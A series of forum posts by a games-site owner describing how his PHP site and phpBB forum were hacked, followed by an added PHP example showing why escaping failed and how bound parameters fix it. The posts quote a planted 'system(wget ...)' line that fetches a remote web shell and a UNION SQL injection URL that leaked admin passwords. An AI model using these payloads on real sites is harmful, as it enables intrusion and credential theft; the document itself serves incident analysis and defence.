hedgehog90

  1. Hi, I have a games site called GPStudios.com I paid to have it built in 2009, but as you can see, it's looking a bit ropey these days compared to most other sites. Since having it built, I have made many alterations to the site, and gradually learnt a lot of html and php along the way. I make games myself, I do all the coding and all the graphics, so I feel quite confident that I can design all the assets of my site with relative ease. I've been using Dreamweaver for years now and I can now quite easily design a page of my own using php, http, javascript and MySQL. My only weakness is getting to grips with css, but I'm working on it. I want to redesign the site from the bottom up, ditch the old design and create something completely new. I will obviously use certain elements of the old site (much like I reuse functions/engines/frameworks in all my games), but the site design is SUCH a mess that I don't think it would be wise to tidy it up. It's too far gone IMO. So, this is my rather broad question... I would like to know where I should start. What methods should I use? My site is currently made up of mostly .php files. Is this appropriate nowadays? I have attached a few files to show you generally how the site is written. Because every page is largely the same, it uses a lot of includes. Even on a page with unique content, it is often included as a separate php (eg homepage_popular). Unfortunately, this makes it difficult to preview the site in the dreamweaver design view. Also, all the functions for the site are contained within a single functions.class.php file, which I was once told was very bad practice. Is it? I'd like to know generally a method or a practice I should use. When every page more or less uses the same template, is repeating the same div tags and includes necessary? Is there a better way of repeating myself? For instance, if I wanted for some reason to not have a header on my site, this would require me to change every single page.
My current site has been a victim to php injection also, so I'd like to know exactly how I can prevent this happening in the new site. I'm not interested in designing it for multiple screen sizes, because most Flash games aren't really made for mobile devices. I think a 950/1000 px width static container is all I need. I am genuinely focussed on redesigning my site, and if it means I have to spend several months of weekends working on it and learning about stuff then so be it. I don't want to pay anyone else to do it, I want it to be 100% my own creation. index.php functions.class.php homepage_popular.php
  2. OK, I've got the message. I'll fuck off now shall I? Sorry for wasting your time.
  3. Indeed, my hole is truly massive.
  4. I did this... or so I thought. Just to say "CLEAN IT" is not the kind of help I am looking for. Obviously, I'd rather get this fixed myself, otherwise I wouldn't have come here, so forgive me if I ignore that. While I am very grateful for the help and attention, I've yet to have someone give me a step by step guide of EXACTLY how to rid myself of these problems. Since I last posted, it appears the hacker has returned AGAIN, this time to change my password to the CMS. I haven't noticed any modifications though apart from this.
  5. FFS, it's back... but now on the forum. I found an edited php file in the file: /forum/caches/tpl_AeroBlue_search_results.html.php and also in: /forum/styles/AeroBlue/template/search_body.html Both contain this line of code at the top: system('wget http://koliasoft.narod2.ru/w.php'); And that downloads and stores a file called w.php in the forum folder. (There's also another file called w.php.1, a copy) All the files in the cache folder appear to be modified almost daily, this must be normal. However, I can see that search_body.html was edited 02.38 AM today. I'm hoping that my fixes worked on the rest of the website, and that's why the problem files have moved to the forum, which I assumed was secure. You would think the latest PHPBB would protect itself from mysql injection??? But apparently not. So, probably from that w.php file, the footer.php had been edited again with that annoying iframe. I need to wait 24 hours until the Apache Logs update on my end before I can start seeing exactly how it was done... As I said earlier, I updated my PHPBB forum to the latest version a few days ago. The username and passwords for the 2 administrators on the forum are different to the other login details for the main site. I guess the person behind this could have also gotten my username and password on the old unprotected pages and made a note of it. For now, I won't change my username/password, because before I change them I want to have fixed the problem of mysql injection on the site. Help?
  6. Great, I think I've got it sorted! I went through all the files, searched for every instance of _GET, _POST and _REQUEST, and depending on their data type (int or string) I have applied mysql_real_escape_string to strings, and (int) to ints. I hope this will be enough to stop the same hacker from ever hacking again. The last 2 days have been hell. Cunt. How can I encrypt my username and password when used in strings? I think there is only 1 instance of this in my code.
  7. Posted a new topic: http://www.phpfreaks.com/forums/index.php?topic=335030.0
  8. Now, obviously, I can't post the actual code that retrieves my admin login details, but the format of the code used is like this: /webpage.php?id=79+and+1=-1+union+/*asd*/+select+1,2,3,password_details,5,6,7,8,9,10,11,12,13,14,15,16+from+databasename/**/.table+limit+0,1-- On the page that loads the string with a _GET I added this code at the top: foreach ($_GET as $key => $value) { $_GET[$key] = mysql_real_escape_string($value); } But, when I eventually _GET("id"), it is no different than if I hadn't processed it with mysql_real_escape_string. The page loads just fine and arrogantly displays my login details like a... well... like a massive c*nt. How can I universally stop injections occurring? If I use (int), it's fine, but there are many other queries elsewhere on the site where I need to _GET a string, for which the above injection code will get through despite mysql_real_escape_string. Help, please.
  9. Looking at the logs, the beginning looked automatic, trying a query a second, but it then looks like it was done manually. There were long pauses between his attempts. I've downloaded the scripts from the site and I want to edit them so that this never happens again. I've been trying mysql_escape_real_string with the url he used to get my username and password, and I still get returned my details. It appears to do fuck all with that particular example.
  10. I've worked part of it out now... I've been going through the logs for HOURS, it's incredibly tedious and boring. I've found the prick who did this: 89.232.248.163. Russian. Crafty. On May 15th, he used mysql injection to get my CMS login details. Once he had the login details he played around in the CMS and replaced a game file with w.php. It turns out you can upload phps despite what I said... After that, he went to playgame page for that specific game, and ran it over and over. I've got to admit, this guy was very quick and clever to do this - the back end is a bit of a mess and very hard for someone else to understand (or so I thought). So, that explains w.php, but it doesn't necessarily explain game.js and the footer.php and index.php files being edited on May 31st. There is certainly absolutely no functionality in the CMS to alter php files, or files of any kind. All the files it uploads/deletes are in the admin folder. Index.php and footer.php are in the root. If w.php when run edited these files, then why didn't it do it 16 days prior? I can't find anything out through the log about these alterations except the time and day that game.js was first run. What now? More importantly, what are the steps to take to make sure this never happens again?
  11. Ok, I've found something. I was going through the logs, and I found the first occurrence of the game.js file being loaded. I looked back a few seconds before this and found a "POST" that said: 188.226.15.54 - - [31/May/2011:09:49:25 -0500] "POST /games/files/w/w.php HTTP/1.1" 200 12970 "http://www.gpstudios.com/games/files/w/w.php" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.71 Safari/534.24" I looked inside the /games/files/w/ and sure enough, there it was. I've attached it to show it to you. I have no idea how this was uploaded. It means it was likely done on the back-end and not through ftp, but the script for uploading new games does not allow the upload of php files, and it's not recorded by mySQL :/ .... I've just been thinking, how could the person who uploaded that file run it? Anything within /games/ is inaccessible because I had locked directory indexing (going through folders like a contents page) in the htaccess file... but last night I noticed my htaccess had disappeared! I didn't even relate it to the apparent hacking I had spent all day trying to fix. I re-uploaded an old one and didn't think anymore about it. It must have been deleted by the person who uploaded it, and then the script was run.... I can't see how it could have been uploaded through the back-end... the only evidence for it is that the w.php file is within a folder called w, which is exactly the same format as the games files. Help, please. [attachment deleted by admin]
  12. I updated it this morning because I read that it might have been the problem. It's up to date, I'm on 3.0.8.
  13. What search term should I search for in mySQL? Download the site and reupload it? I'm sorry, but I really don't see the sense in that, also, due to the amount of data on the website, it would take my internet connection 10s of hours to do this. This would be a last resort, it would be such a massive job. Hostgator are helping me at the moment, hopefully they'll sort it out to some degree.
  14. I changed the password and username for my CMS earlier today, but as I just said (in my edited post), the hacking was certainly not done through the CMS. It's not capable of uploading anything but swfs, text and pictures.
  15. Oh, silly I haven't mentioned yet the url of my website: www.gpstudios.com If by CMS you mean a back-end, then yes, however it can't add to files like index.php or anything like that. It's a games website. The backend allows me to upload/delete games and little else. The hacker must have gotten in through FTP. I have changed the password to the server account. I use Windows 7.... is that secure enough? I'm quite confident that my computer doesn't have any viruses or trojans. Can someone please explain to me how someone can get my personal details/upload files to the server space without my permission? I understand that hacking exists, but I've never truly gotten my head round how websites are hacked into without a data leak?
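
Added example, not code from the posts or from the site: why the escaping loop in post 8 leaves the quoted URL working, assuming the page's query placed id unquoted in a numeric position, and the bound-parameter form for both integer and string inputs. It uses an in-memory SQLite database through PDO so it runs stand-alone; the schema, the data and the escape_like_mysql() helper are constructed stand-ins.

```php
<?php
// Added example. Schema, data and helper names are constructed, not from the site.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE games (id INTEGER, title TEXT)");
$db->exec("CREATE TABLE admins (password_details TEXT)");
$db->exec("INSERT INTO games VALUES (79, 'Sample Game')");
$db->exec("INSERT INTO admins VALUES ('constructed-secret')");

// Rough stand-in for mysql_real_escape_string(): backslash-escapes ', ", \ and NUL.
function escape_like_mysql(string $s): string {
    return addslashes($s);
}

// The pattern from post 8: escape, then interpolate into an unquoted numeric slot.
// Escaping only protects data inside a quoted SQL string literal.
function find_game_vulnerable(PDO $db, string $id): array {
    $id = escape_like_mysql($id);
    $sql = "SELECT id, title FROM games WHERE id = $id";
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Integer parameter: validate the type, then bind it; input never becomes SQL text.
function find_game_safe(PDO $db, string $id): array {
    $n = filter_var($id, FILTER_VALIDATE_INT);
    if ($n === false) {
        return [];   // reject anything that is not a plain integer
    }
    $stmt = $db->prepare("SELECT id, title FROM games WHERE id = :id");
    $stmt->bindValue(':id', $n, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// String parameter: same placeholder mechanism, no manual escaping.
function find_game_by_title(PDO $db, string $title): array {
    $stmt = $db->prepare("SELECT id, title FROM games WHERE title = :t");
    $stmt->execute([':t' => $title]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Constructed input in the same shape as the URL quoted in post 8 (no quote characters).
$payload = "79 and 1=-1 union /*asd*/ select 1, password_details from admins limit 0,1--";

var_dump(escape_like_mysql($payload) === $payload);  // does escaping alter the input at all?
print_r(find_game_vulnerable($db, $payload));        // which table does the returned row come from?
print_r(find_game_safe($db, $payload));              // same input through validation and binding
print_r(find_game_safe($db, "79"));                  // legitimate integer lookup
print_r(find_game_by_title($db, "x' OR '1'='1"));    // quote-bearing string bound as data
```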